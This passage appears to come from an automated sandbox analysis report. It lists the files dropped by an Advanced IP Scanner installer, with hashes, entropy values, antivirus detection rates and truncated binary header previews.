                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                  • Filename: Advanced_IP_Scanner_2.5.4594.12.exe, Detection: malicious, Browse
                                                                                                                                                                                                  • Filename: Advanced_IP_Scanner_2.5.4594.12.exe, Detection: malicious, Browse
                                                                                                                                                                                                  • Filename: , Detection: malicious, Browse
                                                                                                                                                                                                  • Filename: Advanced Scanner.exe, Detection: malicious, Browse
                                                                                                                                                                                                  • Filename: ip_scan_en_us_Release_2.5.4594.1.msi, Detection: malicious, Browse
                                                                                                                                                                                                  • Filename: ipscan.msi, Detection: malicious, Browse
                                                                                                                                                                                                  • Filename: Advanced_IP_Scanner.exe, Detection: malicious, Browse
                                                                                                                                                                                                  • Filename: Advanced_IP_Scanner.exe, Detection: malicious, Browse
                                                                                                                                                                                                  • Filename: IPAVSCAN_win_version_1.1.3.msi, Detection: malicious, Browse
                                                                                                                                                                                                  • Filename: Advanced_IP_Scanner_2.5.4594.1_net.exe, Detection: malicious, Browse
                                                                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                                                                  Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.............s...s...s......s.\S....s..w...s..p...s..v...s..r...s..w...s..u...s..r...s...r...s...w...s...v...s...s...s.......s.......s...q...s.Rich..s.................PE..L.....%^...........!......7...$.....|m5.......7....g..........................[.......[...@..........................eS.....|zY.|....0Z..............B[.(....@Z.8.....P.T.....................P.......P.@.............7..............................text.....7.......7................. ..`.rdata..4.!...7...!...7.............@..@.data...L.....Y..2....Y.............@....rsrc........0Z.......Y.............@..@.reloc..8....@Z.......Y.............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\Qt5Gui.dll (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6708264
                                                                                                                                                                                                  Entropy (8bit):6.661851136227646
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:98304:YMm4f0AN5rHUQ+P2DkVNYVBcE7hxc5Rar3v:Yb4fzN5rHUj+D5VBckhkRGv
                                                                                                                                                                                                  MD5:1FBE59E9BE0F445BB14BE02C0EE69D6F
                                                                                                                                                                                                  SHA1:98F62A873CA78E9BE7760DE0FDDEDC56FAE2505D
                                                                                                                                                                                                  SHA-256:F201494B5EBE609FF2CA7D36275B19AB645C81153417B5FF4852AD8E164E144D
                                                                                                                                                                                                  SHA-512:00A61EB5B7B412CFF8BB92157DD2330FC7729C23E82A6C9648C067581DDF91E0743EC5CF4B3D4D59EA49C7EDCDA63DBF39350A173A354EC465E3F5A5D087F24F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                  • Filename: Advanced_IP_Scanner_2.5.4594.12.exe, Detection: malicious, Browse
                                                                                                                                                                                                  • Filename: Advanced_IP_Scanner_2.5.4594.12.exe, Detection: malicious, Browse
                                                                                                                                                                                                  • Filename: , Detection: malicious, Browse
                                                                                                                                                                                                  • Filename: Advanced Scanner.exe, Detection: malicious, Browse
                                                                                                                                                                                                  • Filename: ip_scan_en_us_Release_2.5.4594.1.msi, Detection: malicious, Browse
                                                                                                                                                                                                  • Filename: ipscan.msi, Detection: malicious, Browse
                                                                                                                                                                                                  • Filename: Advanced_IP_Scanner.exe, Detection: malicious, Browse
                                                                                                                                                                                                  • Filename: Advanced_IP_Scanner.exe, Detection: malicious, Browse
                                                                                                                                                                                                  • Filename: IPAVSCAN_win_version_1.1.3.msi, Detection: malicious, Browse
                                                                                                                                                                                                  • Filename: Advanced_IP_Scanner_2.5.4594.1_net.exe, Detection: malicious, Browse
                                                                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                                                                  Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........#..B}..B}..B}..:.B}.+..B}../y..B}../~..B}../x..B}../|..B}.|/|..B}..*|..B}..B|.#G}.|/y..B}.|/x..C}.|/}..B}.|/...B}..B.B}.|/...B}.Rich.B}.........................PE..L.....%^...........!......E...".......E......0E..............................`g.......f...@.........................P.J..`..,Gb.@.....d..............@f.(.....d.\....rJ.T....................sJ......sJ.@............0E.4............................text...O.E.......E................. ..`.rdata..,....0E.......E.............@..@.data....A...0c..\....c.............@....rsrc.........d......xc.............@..@.reloc..\.....d......~c.............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\Qt5Network.dll (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1151016
                                                                                                                                                                                                  Entropy (8bit):6.482547207070433
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24576:Ql4zuvU31UisunBgeZaGKYbmYccwy9v5nOUhqJEe:Ql4q8lUd2z3mYVBb8H
                                                                                                                                                                                                  MD5:ED04DAB88E70661E4980A284B0DF6A0C
                                                                                                                                                                                                  SHA1:C1499360A68FDC12013A6CBB35C05A3098E95F41
                                                                                                                                                                                                  SHA-256:9AFF2CCBD77806D7828CE99481104515FA34859499C0A17FFE4785DE44E0A2F9
                                                                                                                                                                                                  SHA-512:E2B41A7A80216ECC9ADDE467E9DA84C39A4C593C0D3928442C0AC079F8D854A3605DF9E93A1408C0042F5C4D2A41CBBA281BBBB3524F5BE8F4E5DAFEA048E87A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........)>..Gm..Gm..Gm...m..Gm..Fl..Gm..Bl..Gm..Cl..Gm..Dl..GmO.Fl..Gm.Fl..Gm..Fm..GmO.Bl..GmO.Gl..GmO..m..Gm...m..GmO.El..GmRich..Gm........................PE..L.....%^...........!.....0...v.......4.......@.....d......................................@.............................d$..t........................t..(...........@...T...................<...........@............@..\............................text............0.................. ..`.rdata...N...@...P...4..............@..@.data...4I..........................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\Qt5PrintSupport.dll (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):327208
                                                                                                                                                                                                  Entropy (8bit):6.804582730583226
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:zqg47yYJkKxQ8WVauJIg9FzQGRPvhUhcD3I95HIbPSRyuoboXHcJ2ZWa3Imr1y6a:LgTxQ3UuJIg9FzQGRPvlf
                                                                                                                                                                                                  MD5:72B2E7A9AF236E5CA0C27107E8C5690C
                                                                                                                                                                                                  SHA1:6AC273911118C7CAA71818C55E22D27B4C36B843
                                                                                                                                                                                                  SHA-256:725DD45CF413D669D22FD38BAFFB5296BD2FEC4C0379A1FA3ABA4CC12C41768A
                                                                                                                                                                                                  SHA-512:C4D217EB21501E1A26AFA5A6CB5B53152F6330A96A58B83709BE2C615594E1D640DD65E5353AD8CD2E7E3B4EABBB8E3AFF0F5D13D5577A1CCC05B590CC9803B6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........k...8...8...8.*8...8..9...8..9...8..9...8..9...8...9...8...9...8...8..8...9...8...9...8..F8...8...8...8...9...8Rich...8................PE..L...t.%^...........!.....z...j......T.....................................................@..........................}...k..............................(........7...a..T....................b.......a..@............................................text....x.......z.................. ..`.rdata...............~..............@..@.data...............................@....rsrc...............................@..@.reloc...7.......8..................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\Qt5Widgets.dll (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5735464
                                                                                                                                                                                                  Entropy (8bit):6.639119541918398
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:hQQeqQ4ZHCscH74ar0+qrlOjvuzu7mA4a59KEyhRO6LyUfqcVeaXafSKHZV+gZtK:hzeqxHCTf4+qwGLW9sRO6XW+I9ipjN
                                                                                                                                                                                                  MD5:41C0478595550900E33B52B8CDBEDEAA
                                                                                                                                                                                                  SHA1:0550C6434EF71260D3581CE2A90F080DE93E01D6
                                                                                                                                                                                                  SHA-256:44E495DE09B59E66FDF0C1C65A2070A4CE95BAAF4169C875DEA0590BD37342BD
                                                                                                                                                                                                  SHA-512:9302EDB0DE46E0F132271532140F19D1C3B9DCE0D1F11046148E6DC81C689A07256928839FF0D64708A718004E1F216BE0F64C5C9B05CC1C612B6E0E71CC442D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Q...}...}...}.......}.......}.......}.......}.......}.......}..N....}...}..cp......}.......}....y..}...}...}.......}..Rich.}..........................PE..L.....%^...........!.....H>..J.......J>......`>....e..........................W.....h.X...@..........................ZI.D...T.Q......0T..............hW.(....@T.....prH.T...................lsH......rH.@............`>.l5...........................text....F>......H>................. ..`.rdata...2...`>..4...L>.............@..@.data........S..Z....S.............@....rsrc........0T.......S.............@..@.reloc.......@T.......S.............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\Qt5WinExtras.dll (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):498216
                                                                                                                                                                                                  Entropy (8bit):6.392626000362742
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:lOssvQ+soy9eQdVgSTZuyvDTSVHyZ1Hy6:lsYvo4eQdKzW
                                                                                                                                                                                                  MD5:C80BA989BA52F73AD4332EA7B3BE0499
                                                                                                                                                                                                  SHA1:F4A2A70F2E23DB44AEC358F3DD282E68483AC631
                                                                                                                                                                                                  SHA-256:C86C36B20B602D6A063575136ECB417EB0A7AD8DDDBB966750FA348FEB74D309
                                                                                                                                                                                                  SHA-512:255862D9678F5380581F9C728327C3EA83D724A163ED35FA18BE22C35415E0E2819B8A4D2EACC0D94E53C5C3AB3D62AA2E978EF7C4F281C173C1C0A050A8EB5C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.!...O...O...O.......O...N...O...J...O...K...O...L...O.X.K...O.X.N...O...N...O...N...O...J...O...O...O......O.......O...M...O.Rich..O.........PE..L.....&^...........!.....Z...`.......\.......p............................................@..........................{...8..\........0...............~..(....@..,....p..T....................q.......p..@............p...............................text...,X.......Z.................. ..`.rdata...j...p...l...^..............@..@.data....B..........................@....rsrc........0......................@..@.reloc..,....@......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\Qt5Xml.dll (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):228904
                                                                                                                                                                                                  Entropy (8bit):6.499413249756033
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:5vv6tCZo5oOM7fpXiUpuF007hkeWPp4bjUAIt1zG0jvbkEV3:56tb5NM7fpXiUkFdNqB4Gt1zG0h3
                                                                                                                                                                                                  MD5:0B4816D5308825B9C24FAA83CE4CB1F0
                                                                                                                                                                                                  SHA1:0EEFEF3564356B50D5B360DC4B8D8D316C99B210
                                                                                                                                                                                                  SHA-256:F10815CB6F99FA795B69FB547BA4376A336F46BC1FA279B486A24AD96FD74525
                                                                                                                                                                                                  SHA-512:806B6B203D73D08E127365C87A9AF98811E1C93568F66DFBFAE41EE13C97AC3FE623D42BC1A1FFFE36669B14E0F4E39499EC177ECA39B7339F57E50C97B20B2B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........>..._.,._.,._.,.'],._.,.2.-._.,.7.-._.,.2.-._.,.2.-._.,.2.-._.,Q2.-._.,._.,\_.,Q2.-._.,Q2.-._.,Q21,._.,._Y,._.,Q2.-._.,Rich._.,................PE..L.....%^...........!..............................a................................?\....@.............................T\..4)..x....`...............b..(....p..."..0...T...............................@............................................text............................... ..`.rdata..............................@..@.data........P.......2..............@....rsrc........`.......8..............@..@.reloc..."...p...$...>..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner.exe (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1681960
                                                                                                                                                                                                  Entropy (8bit):6.535592110075899
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:N7MNjXLsvFfAhpjccQ1hhTlPrLFhNG2y+L+aJwDcN:0jXL2mboRRhrL42yE
                                                                                                                                                                                                  MD5:B3411927CC7CD05E02BA64B2A789BBDE
                                                                                                                                                                                                  SHA1:B26CFDE4CA74D5D5377889BBA5B60B5FC72DDA75
                                                                                                                                                                                                  SHA-256:4B036CC9930BB42454172F888B8FDE1087797FC0C9D31AB546748BD2496BD3E5
                                                                                                                                                                                                  SHA-512:732C750FA31D31BF4C5143938096FEB37DF5E18751398BABD05C01D0B4E5350238B0DE02D0CDFD5BA6D1B942CB305BE091AAC9FE0AAD9FC7BA7E54A4DBC708FD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...................................@...........!..L.!This program cannot be run in DOS mode....$........lj..............u........j......x.......x.......d.......f.......x.......x.......f.......c.......c.......f..............'x......'x..`...'x..............'x......Rich............................PE..L....gb..........".................U.............@..........................P............@..................................3.......... p..............(....p..0....R..T....................S.......R..@...............d*...........................text.............................. ..`.rdata..b...........................@..@.data........0...4..................@....rsrc... p.......r...H..............@..@.reloc..0....p......................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_ar_sa.qm (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):26334
                                                                                                                                                                                                  Entropy (8bit):5.237840743757654
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:sIX3LNpZy4imY2tBA01s0iMJ/vZYM2jeFxikFq2pkMPcK8LM+OEM4q78nkL9BHDS:TX3xpZy4BaMJ/vZJ2jeFxieN8LMkpk6
                                                                                                                                                                                                  MD5:6AB50593778FB5BD5D5422BDD90595E6
                                                                                                                                                                                                  SHA1:282946268660F41A7484BF19C30B7B958F6A82D4
                                                                                                                                                                                                  SHA-256:132676D1F5044AE5249B764B0CD4B67993932D121FBDDC13DB2AE75961562F0F
                                                                                                                                                                                                  SHA-512:359B8EE830E74575BDB7519F98180DD3440BBBE03DE9247F2FCF6A3EFD721DD1F56DB96DBF0D47E847EA6B6365BD5AD97DF6D5B277F5926622918FF05578DB37
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........R....;...J...;...c...;.......;.......;..>....O..U....[..Q....^..+....^..M...(5...y..G.......H,..J...K...:...N:......V...?..._...V.......%.......K....y..Ki......................R....t..'....t..K....t..UK.....<....j......5t......@...=...H5..S...f...+.......@........;...........~...l...`..2....e..T.......T.......... =...A..*.y.....*.y.....*.%..!..*.0..!..+.....+.+.......+....Z.+....$.+....#..G.......G....'].H0...U%.Hw9.....Hw9.....I....%^.J6......J6......J6......J6...D).LD....d.L.b..Ur.M.S..<j.R.....0.V....+..Wi...Tr.W.T...m.Z.|..L..[f3..P..gc......w0K..B...H...".......VF...T...a..."..0L...~..2p.. d..@....T..*W..2...........S.......Y..9.E..;Z.L.#..\..M$o.....e.....".l8...2....^..D^..I....>......=.......MY......S...>......>...:..3..+e..l...E.......5..5.l..X..AV...%'.y....Q....0..N.......M.......SA..tb..1.......................Nk......8.......I..(....M..1V...&(.R....-..W.<..Y}.f.~...f....../...1........^..1k...5..............c..A@.;6...[..q.J..JL..I.......I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_bg_bg.qm (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28561
                                                                                                                                                                                                  Entropy (8bit):5.2596092915719215
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:O4suMMyQmmoRKIKfAoMzI4VxECTwTPJBLCsDbn:tsuMMypm/M04MCYTL/n
                                                                                                                                                                                                  MD5:1D2AAC0633801D7DEF387CF78A968BFF
                                                                                                                                                                                                  SHA1:D4721BBF3AA690683DCD75B690080A9785BF81B5
                                                                                                                                                                                                  SHA-256:8FDF83BEB8D7E9D3CD0B77DDC636A77A1E4FF591ED10851229ED49BDC78644DF
                                                                                                                                                                                                  SHA-512:956759A441647A00FCEA9AA4BE7DBA4463DDC6DA2EBBBFDF697BAED99CEF55B924D72F92E3443251C5C64927FF37DE345F95C366920ADFE829823105C3EB0673
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........[H...;...D...;.......;.......;..!....;..Ef...O..^,...[..Y....^..0....^..U...(5...m..G.......H,..R...K...A...N:......V...F..._..._`......).......R....y..S........7..............[ ...t..+O...t..S....t..]......B....j......5t...y..@...D}..H5..[...f...1!......Gn.......a...........~..4....`..9....e..]E......]k......... =...H..*.y...f.*.y...u.*.%..%F.*.0..%o.+.......+.......+......+......+....'..G.... ..G....+..H0...]..Hw9.....Hw9.....I....)@.J6......J6......J6......J6...K#.LD......L.b..^..M.S..C..R.......V....1O.Wi...\..W.T.....Z.|..Tm.[f3..Xd.gc......w0K..I...H...&-......^....T......."..6....~..8... d..G....T../W..2...........\L......b..9.E..B..L.#..e_.M$o...\.e.......l8...83...^..K`..I....J......D.......U_......\...>......>...z..3..0...l...L.......;..5.l..a..AV...(..y....ZW...0..V8......U.......[...tb..7.......................V.......?4......Q..(....U..1V...*&.R....2..W.<..b..f.~..".......5...1....g...^..7....5...[..........c..H@.;6...c..q.J..Q...I.......I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_console.exe (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):389160
                                                                                                                                                                                                  Entropy (8bit):6.42467668414915
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:KsFG7TN7RchK49w1j0GqH8HQQG16lNWjL2D7hn1WMrNayAAXe0jvYE:LgTN7RWK+PH2llNWGXRay7e0b1
                                                                                                                                                                                                  MD5:12BF5F988FF62C112FAC061D9EC97C47
                                                                                                                                                                                                  SHA1:C4E01DE097C1564872F889C5BBBD8D0559EDAE73
                                                                                                                                                                                                  SHA-256:BE2B45B7DF8E7DEA6FB6E72D776F41C50686C2C9CFBAF4D456BCC268F10AB083
                                                                                                                                                                                                  SHA-512:4B389005D647BC2108303C6E78F648D768D3F75ED84F694E75B54B95166E1569D1650508375514CB0FA0FB2F5DFC49CBD4DE1D6FA376FBA8619645EE2BC08104
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                  Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......6 .yrA.*rA.*rA.*{9w*|A.*f*.+sA.*U..*sA.* 4.+RA.* 4.+~A.* 4.+vA.*.(.+pA.* 4.+vA.*f*.+sA.*f*.+nA.*./.+wA.*rA.*.C.*.4.+sA.*.4.+#A.*.4.*sA.*rAs*sA.*.4.+sA.*RichrA.*................PE..L...U.gb.........."..........R....../X............@..........................P.......[....@.........................................p..@p..............(.......$X......T...............................@............................................text............................... ..`.rdata...$.......&..................@..@.data...._..........................@....rsrc...@p...p...r..................@..@.reloc..$X.......Z...z..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_cs_cz.qm (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28199
                                                                                                                                                                                                  Entropy (8bit):4.76848600543852
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:7zGw8sjK6qVziPNAsFApjRkBmPNsGYR8XQrjxpi5Qg7C/XoVsLf7ra3sEYUq:3Gw8B6qVePNAPjuYPNHAnxW7qoVsLff
                                                                                                                                                                                                  MD5:7C52599AA9F2C07DCC95378CA4BECD86
                                                                                                                                                                                                  SHA1:73831CA352BED5C6764BCB544301396C55706E6D
                                                                                                                                                                                                  SHA-256:B495F4FF61EBB88402BCD068BFD3C7EAD171CABE68C9312280F1EBAA32CCEB6F
                                                                                                                                                                                                  SHA-512:340EFFF03017538F010D7FB83BE1407E255D479A41B177189220F5D1D8D4BB6E3F668473AAAB35BFD7D8FA4742FC970E061AD0F16A1E3AE5D28DB1F0958DF1EE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........Z....;.......;.......;.......;..!k...;..C....O..\....[..X....^..0....^..T6..(5......G....\..H,..Q"..K...@P..N:...@..V...EA.._...].......).......QK...y..Q................x......Y....t..*....t..RH...t..\o.....AB...j...o..5t......@...C...H5..Z...f...01......F....................~..3....`..7....e..[.......\........:. =...G..*.y.....*.y...I.*.%..$..*.0..%..+.....K.+.......+....z.+......+....&..G.... {.G....+=.H0...\A.Hw9...g.Hw9.....I....(..J6....V.J6......J6......J6...I..LD......L.b..\..M.S..A..R.......V....0].Wi...[..W.T.....Z.|..S..[f3..V..gc....L.w0K..HD..H...%.......]x...T......."..5....~..7... d..F....T......2....%......[.......aW.9.E..@..L.#..c..M$o.....e.......l8...6....^..I...I....f......CH......S.......Z...>...)..>......3../...l...KL......:>.5.l..`E.AV...(m.y....X....0..T.......S.......Zc..tb..5.......................U/......=.......O..(....T\.1V...)..R....1..W.<..`..f.~..">......4...1....+...^..6%...5..............c..F..;6...bk.q.J..P...I....!..I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_da_dk.qm (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):26959
                                                                                                                                                                                                  Entropy (8bit):4.713288631353564
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:ihIXQdwIyWqLSTgN1YYgX+9S1Dk+nK+sF7SVLHElRh:3XQdwIUCgN1YYgE2k1A4
                                                                                                                                                                                                  MD5:AE4754AC60C32B9D44B47CAA489E5337
                                                                                                                                                                                                  SHA1:6C3AEC0A9EF0945C06562D0ACD0E0558E18992AD
                                                                                                                                                                                                  SHA-256:D09D333B00D073C09837F669D7A8DDD77D50B2D94A177E58CE556AF83700371A
                                                                                                                                                                                                  SHA-512:74710A20298F162D6BE02F7BCBB964E447345D219887216366A7DCD283267A708666E974195F279E384526E324E27F0FBD713411E6BA58DE266069143575C6DC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........U....;.......;.......;.......;.. A...;..@....O..XZ...[..TL...^...1...^..P:..(5......G....6..H,..MT..K...=@..N:...,..V...B#.._...Yn......'.......M....y..M.......................U~...t..)I...t..NV...t..X......>....j...[..5t...-..@...?...H5..V?..f....W......B........u.......Y...~..1....`..5....e..W.......W........:. =...C..*.y...B.*.y...E.*.%..#..*.0..#..+.......+.......+......+......+....%q.G.....g.G....)..H0...W..Hw9...g.Hw9.....I....'T.J6......J6....@.J6......J6...Fo.LD......L.b..X2.M.S..>..R.....\.V.....{.Wi...W4.W.T.....Z.|..O..[f3..R..gc....~.w0K..E...H...$w......X....T......."..2....~..4... d..Cc...T..,...2...........V.......\..9.E..=..L.#.._!.M$o.....e.......l8...4c...^..F...I....L......@"......O.......Vg..>......>...n..3..-...l...H*......7..5.l..[..AV...'..y....T....0..P.......O.......V...tb..3z.......s.......y......Q.......:.......L..(....Pf.1V...($.R....0).W.<..\).f.~..!.......2r..1........^..3....5..............c..C..;6...]..q.J..L...I.......I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_de_de.qm (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28739
                                                                                                                                                                                                  Entropy (8bit):4.641812949957873
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:fCwKr9wd6dllAddv/+l8hPMaupXxkMwWEXkw7NLgADR1w:fsrzdllA7H+l8hEOMwWWvA
                                                                                                                                                                                                  MD5:65A1638D5074FA60210BB5B67A4E3DB3
                                                                                                                                                                                                  SHA1:4A6B5C87D49F665BCECD0248ED0FB3BBCDF07682
                                                                                                                                                                                                  SHA-256:23B63D04EEFAE8E50FFC6963C1E45511C7D034D54F94B17C9B1B53F899BFB340
                                                                                                                                                                                                  SHA-512:D6A224A13C9E301DA124D660FD30B7FBBC8BADBA6484D39D1FDAC5410D44C48A963EA1182237FD72AD77609898C8F713CB22DCD7E20EA037BFAE6B8E25DB25C3
                                                                                                                                                                                                  Malicious:false
